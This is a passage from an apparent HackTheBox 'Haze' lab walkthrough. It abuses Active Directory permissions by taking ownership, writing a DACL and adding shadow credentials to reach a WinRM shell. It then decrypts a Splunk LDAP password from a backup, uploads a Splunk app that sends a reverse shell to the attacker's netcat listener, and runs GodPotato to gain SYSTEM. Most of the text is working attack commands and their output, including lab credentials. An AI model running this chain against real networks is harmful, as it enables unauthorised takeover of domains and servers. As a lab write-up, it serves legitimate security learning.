INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 01M 24S
INFO: Compressing output into 20250621225343_bloodhound.zip

We can see HAZE-IT-BACKUP@HAZE.HTB -> WriteOwner -> SUPPORT_SERVICES@HAZE.HTB -> ForceChangePassword/ AddKeyCedentialLink -> EDWARD.MARTIN@HAZE.HTB

WriteOwner

Set HAZE-IT-BACKUP@HAZE.HTB as group owner of SUPPORT_SERVICES@HAZE.HTB

└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

No we need to add HAZE-IT-BACKUP@HAZE.HTB to SUPPORT_SERVICES@HAZE.HTB, but before that, we need to add all permissions to ourselves

└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$' haze.htb/'Haze-IT-Backup$' -hashes :4de830d1d58c14e241aff55f82ecdba1 -dc-ip 10.10.11.61
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250622-150331.bak
[*] DACL modified successfully!

Now Haze-IT-Backup$ has full control over SUPPORT_SERVICES we can add ourselves to SUPPORT_SERVICES

└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' add groupMember SUPPORT_SERVICES 'Haze-IT-Backup$'                                             
[+] Haze-IT-Backup$ added to SUPPORT_SERVICES

Shadow Credentials

we will use https://github.com/ShutdownRepo/pywhisker.git for shadow credentials

└─$ python3 ./pywhisker.py -d "haze.htb" -u "Haze-IT-Backup$" -H "4de830d1d58c14e241aff55f82ecdba1" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: dce8fcca-0909-fd32-ec64-a49f22908dae
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: wWY9OlFa.pfx
[+] PFX exportiert nach: wWY9OlFa.pfx
[i] Passwort für PFX: L3oq6tfwmifew1Nbn7Pm
[+] Saved PFX (#PKCS12) certificate & key at path: wWY9OlFa.pfx
[*] Must be used with password: L3oq6tfwmifew1Nbn7Pm
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Now let’s use https://github.com/dirkjanm/PKINITtools

└─$ python3 gettgtpkinit.py -cert-pfx 'wWY9OlFa.pfx' -pfx-pass 'L3oq6tfwmifew1Nbn7Pm' "haze.htb"/'edward.martin' 'edward.ccache'
2025-06-22 23:33:01,872 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-22 23:33:02,284 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-22 23:33:03,242 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-22 23:33:03,242 minikerberos INFO     1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
INFO:minikerberos:1f1c7507edbc0aafc6f26dcd6fcbec522458f5c5cf549fed52257d15982d98db
2025-06-22 23:33:03,246 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
                                                    

Using this TGT, we can grab our NT hash:

Setting Environment Variables

└─$ netexec smb 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --generate-krb5-file ./krb5.conf
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze/PKINITtools]
└─$ export KRB5_CONFIG=./krb5.conf      

└─$ export KRB5CCNAME=edward.ccache

now we winrm via cache file

└─$ evil-winrm -i dc01.haze.htb -k  -f edward.ccache -r haze.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: Useless cert/s provided, SSL is not enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> 

and we have user.txt

Privilege Escalation

Shell as Alexander. Green

Extracting cred from Splunk auth

found a backup zip

*Evil-WinRM* PS C:\Backups\Splunk> dir

    Directory: C:\Backups\Splunk

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   3:22 PM       27445566 splunk_backup_2024-08-06.zip

We found authentication.conf file which contains bindDNpassword

┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP                                                                                                                                                                                                                                                                              

We also found splunk.secret

└─$ find Splunk 2>/dev/null | grep splunk.secret
Splunk/etc/auth/splunk.secret
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat Splunk/etc/auth/splunk.secret                                                     
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B                   

Now we can decrypt

└─$ splunksecrets splunk-decrypt --splunk-secret Splunk/etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24

Let’s login as admin on the portal

Splunk rev shell

under “apps” → “Manage Apps” we can see there is an option to install apps via files

We will use this to get the shell, edit the run.ps1 to add our IP and port

after that zip the files and rename it

└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.bat
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ ls
README.md  reverse_shell_splunk  reverse_shell_splunk.tgz
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Haze/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

now we have to install the app and wait for shell

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.61] 56055
id
PS C:\Windows\system32> 

SeImpersonatePrivilege

we can see that Alexander has SeImpersonatePrivilege

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> 

I tried for printspooler64.exe but it not work

let’s try https://github.com/BeichenDream/GodPotato

PS C:\Users\Public> .\GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15bbf199-14a0-49a5-a5a4-a457ca587973\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b402-1418-ffff-8303-caa7809cb3df
[*] DCOM obj OXID: 0xabb94c51616ed9bf
[*] DCOM obj OID: 0xeb89f4000f4cd7f1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3948

Since we can get NT AUTHORITY\NETWORK SERVICE we can get the shell/ root.txt

PS C:\Users\Public> ./GodPotato-NET4.exe -cmd 'cmd /c type "C:\Users\Administrator\Desktop\root.txt"'
[*] CombaseModule: 0x140732389326848
[*] DispatchTable: 0x140732391917896
[*] UseProtseqFunction: 0x140732391209792
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\95977aec-7d51-4af5-b869-850d9faf2d99\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002402-0ad8-ffff-0b99-796f9b96b0eb
[*] DCOM obj OXID: 0x191bd70ca41753e5
[*] DCOM obj OID: 0xeaef92e998db3d97
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 932 Token:0x700  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3828
20897512e70c4967eef1c25f504d83f9